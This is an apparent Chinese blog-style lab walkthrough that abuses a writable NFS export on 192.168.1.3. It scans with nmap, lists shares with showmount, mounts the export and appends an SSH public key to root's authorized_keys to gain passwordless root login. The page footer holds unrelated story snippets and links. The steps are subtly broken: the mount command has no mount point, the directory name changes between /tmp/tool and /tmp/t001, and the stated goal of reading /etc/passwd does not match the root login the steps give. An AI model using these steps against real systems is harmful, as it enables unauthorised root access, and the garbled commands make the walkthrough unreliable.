目的:利用nfs服务的共享目录配置漏洞,读取目标主机的/etc/passwd文件
原理:NFS服务配置漏洞,赋予了根目录远程可写权限,导致/root/ssh/authorized_keys可被修改,实现远程ssh无密码登录。
步骤:nmap -p0-65535 192.168.1.3 查看目标主机上nfs服务是否开启,
输入:showmount -e 192.168.1.3,查看指定的远程共享目录列表。
输入:ssh-keygen (一路回车),生成sa公钥;
输入:mkdir /tmp/tool , 建立tool目录,
输入:mount -t nfs 192.168.1.3:/tmp/tool/ , 把.1.3的根目录挂载到tool目录下,
输入:cat /root/.ssh/id_rsa.pub >> /tmp/t001/root/.ssh/authorized_keys , 把生成的公钥追加到靶机dauthorized_keys目录下,实现ssh免密码登录;
输入:ssh root@192.168.1.3 , 登录进目标主机。
Nmap --- NFS共享目录配置漏洞
©著作权归作者所有,转载或内容合作请联系作者
- 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
- 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
- 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
推荐阅读更多精彩内容
- 各版本hadoop文档地址 Hadoop的框架最核心的设计就是:HDFS(Hadoop Distributed F...
- 之前的有点忘记了,这里在云笔记拿出来再玩玩.看不懂的可以留言 大家可以尝试下Ambari来配置Hadoop的相关环...